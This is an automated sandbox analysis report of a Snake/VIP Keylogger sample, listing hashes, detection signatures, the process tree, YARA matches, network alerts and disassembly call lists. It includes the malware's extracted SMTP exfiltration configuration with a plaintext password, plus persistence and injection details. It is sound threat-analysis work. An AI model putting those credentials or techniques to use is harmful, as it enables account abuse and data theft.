
Windows Analysis Report
AHSlIDftf1.exe

Overview

General Information

Sample name: AHSlIDftf1.exe (renamed because the original name is a hash value)
Original sample name: e66dc1e184e0838c2c811bebc1780a4e17c0e005af799ecfebc4868664b94a0f.exe
Analysis ID: 1587865
MD5: 6a0297e362831d810a049e0ef860147e
SHA1: 0d5d32ca2b5e36fcc209a7fc6ee12efbf3cf572f
SHA256: e66dc1e184e0838c2c811bebc1780a4e17c0e005af799ecfebc4868664b94a0f
Tags: exe, SnakeKeylogger, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • AHSlIDftf1.exe (PID: 5544 cmdline: "C:\Users\user\Desktop\AHSlIDftf1.exe" MD5: 6A0297E362831D810A049E0EF860147E)
    • Sancerre.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\AHSlIDftf1.exe" MD5: 6A0297E362831D810A049E0EF860147E)
      • RegSvcs.exe (PID: 3328 cmdline: "C:\Users\user\Desktop\AHSlIDftf1.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 3052 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Sancerre.exe (PID: 3244 cmdline: "C:\Users\user\AppData\Local\konked\Sancerre.exe" MD5: 6A0297E362831D810A049E0EF860147E)
      • RegSvcs.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\konked\Sancerre.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Extracted malware configuration:
{"Exfil Mode": "SMTP", "Email ID": "info@standartasansor.com", "Password": "StA7759*", "Host": "mail.standartasansor.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "info@standartasansor.com", "Password": "StA7759*", "Host": "mail.standartasansor.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | strings:
  • 0x2df1b:$a1: get_encryptedPassword
  • 0x2e238:$a2: get_encryptedUsername
  • 0x2dd2b:$a3: get_timePasswordChanged
  • 0x2de34:$a4: get_passwordField
  • 0x2df31:$a5: set_encryptedPassword
  • 0x2f5dd:$a7: get_logins
  • 0x2f540:$a10: KeyLoggerEventArgs
  • 0x2f1a5:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
1.2.Sancerre.exe.730000.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1.2.Sancerre.exe.730000.1.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
1.2.Sancerre.exe.730000.1.raw.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
1.2.Sancerre.exe.730000.1.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
1.2.Sancerre.exe.730000.1.raw.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | strings:
  • 0x2e11b:$a1: get_encryptedPassword
  • 0x2e438:$a2: get_encryptedUsername
  • 0x2df2b:$a3: get_timePasswordChanged
  • 0x2e034:$a4: get_passwordField
  • 0x2e131:$a5: set_encryptedPassword
  • 0x2f7dd:$a7: get_logins
  • 0x2f740:$a10: KeyLoggerEventArgs
  • 0x2f3a5:$a11: KeyLoggerEventArgsEventHandler

System Summary

barindex
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , ProcessId: 3052, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 178.210.170.40, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 3328, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49759
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs" , ProcessId: 3052, ProcessName: wscript.exe

Data Obfuscation

barindex
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\konked\Sancerre.exe, ProcessId: 5812, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T18:46:36.756257+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:38.042437+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:40.664480+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:51.865598+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:53.603779+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49758 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:56.318091+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49763 | 104.21.64.1 | 443 | TCP
2025-01-10T18:46:58.931382+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49767 | 104.21.64.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T18:46:34.936633+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:36.155345+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:37.467754+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49733 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:38.734359+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49735 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:41.389629+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:42.717746+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49741 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:50.327134+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49754 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:51.280272+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49754 | 193.122.6.168 | 80 | TCP
2025-01-10T18:46:52.702279+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49757 | 193.122.6.168 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T18:46:47.029383+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49751 | 149.154.167.220 | 443 | TCP
2025-01-10T18:47:02.653410+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49772 | 149.154.167.220 | 443 | TCP

AV Detection

barindex
Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@standartasansor.com", "Password": "StA7759*", "Host": "mail.standartasansor.com", "Port": "587", "Version": "4.4"}
Source: 1.2.Sancerre.exe.730000.1.raw.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@standartasansor.com", "Password": "StA7759*", "Host": "mail.standartasansor.com", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | ReversingLabs: Detection: 73%
Source: AHSlIDftf1.exe | Virustotal: Detection: 70%
Source: AHSlIDftf1.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Joe Sandbox ML: detected
Source: AHSlIDftf1.exe | Joe Sandbox ML: detected

Location Tracking

barindex
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: AHSlIDftf1.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49755 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: Sancerre.exe, 00000001.00000003.1764694364.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000001.00000003.1765322342.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1917758127.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1918092494.0000000003D10000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Sancerre.exe, 00000001.00000003.1764694364.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000001.00000003.1765322342.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1917758127.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1918092494.0000000003D10000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DBDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00DBDBBE
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC68EE FindFirstFileW,FindClose | 0_2_00DC68EE
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_00DC698F
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DBD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00DBD076
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DBD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00DBD3A9
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00DC9642
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00DC979D
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00DC9B2B
Source: C:\Users\user\Desktop\AHSlIDftf1.exe | Code function: 0_2_00DC5C97 FindFirstFileW,FindNextFileW,FindClose | 0_2_00DC5C97
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 1_2_005DDBBE
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E68EE FindFirstFileW,FindClose | 1_2_005E68EE
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 1_2_005E698F
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 1_2_005DD076
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 1_2_005DD3A9
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 1_2_005E9642
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 1_2_005E979D
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 1_2_005E9B2B
Source: C:\Users\user\AppData\Local\konked\Sancerre.exe | Code function: 1_2_005E5C97 FindFirstFileW,FindNextFileW,FindClose | 1_2_005E5C97
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00CEF45Dh | 2_2_00CEF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00CEF45Dh | 2_2_00CEF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00CEFC19h | 2_2_00CEF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051331E0h | 2_2_05132DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05132C19h | 2_2_05132968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05130D0Dh | 2_2_05130B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05131697h | 2_2_05130B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513D7F9h | 2_2_0513D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051331E0h | 2_2_05132DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513CF49h | 2_2_0513CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513F209h | 2_2_0513EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513E0A9h | 2_2_0513DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 2_2_05130673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513E959h | 2_2_0513E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051331E0h | 2_2_0513310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513DC51h | 2_2_0513D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513FAB9h | 2_2_0513F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 2_2_05130853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 2_2_05130040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513D3A1h | 2_2_0513D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513EDB1h | 2_2_0513EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513F661h | 2_2_0513F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0513E501h | 2_2_0513E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05157EB5h | 2_2_05157B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05159280h | 2_2_05158FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515C826h | 2_2_0515C558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05150FF1h | 2_2_05150D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515E816h | 2_2_0515E548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05151449h | 2_2_051511A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515ECA6h | 2_2_0515E9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051518A1h | 2_2_051515F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515CCB6h | 2_2_0515C9E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051532B1h | 2_2_05153008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051562D9h | 2_2_05156030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515BF06h | 2_2_0515BC38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515DEF6h | 2_2_0515DC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051502E9h | 2_2_05150040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05153709h | 2_2_05153460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05150741h | 2_2_05150498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov esp, ebp | 2_2_0515B081
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05156733h | 2_2_05156488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515E386h | 2_2_0515E0B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515C396h | 2_2_0515C0C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05150B99h | 2_2_051508F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515B5E6h | 2_2_0515B318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051525A9h | 2_2_05152300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515D5D6h | 2_2_0515D308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051579C9h | 2_2_05157720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051555D1h | 2_2_05155328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05152A01h | 2_2_05152758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515DA66h | 2_2_0515D798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05155A29h | 2_2_05155780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515FA56h | 2_2_0515F788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05152E59h | 2_2_05152BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515BA76h | 2_2_0515B7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05155E81h | 2_2_05155BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05156CC1h | 2_2_05156A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 051548C9h | 2_2_05154620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05151CF9h | 2_2_05151A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05157119h | 2_2_05156E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05154D21h | 2_2_05154A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515D146h | 2_2_0515CE78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515F136h | 2_2_0515EE68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05152151h | 2_2_05151EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05155179h | 2_2_05154ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05157571h | 2_2_051572C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0515F5C6h | 2_2_0515F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0123F45Dh | 8_2_0123F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0123F45Dh | 8_2_0123F4AC
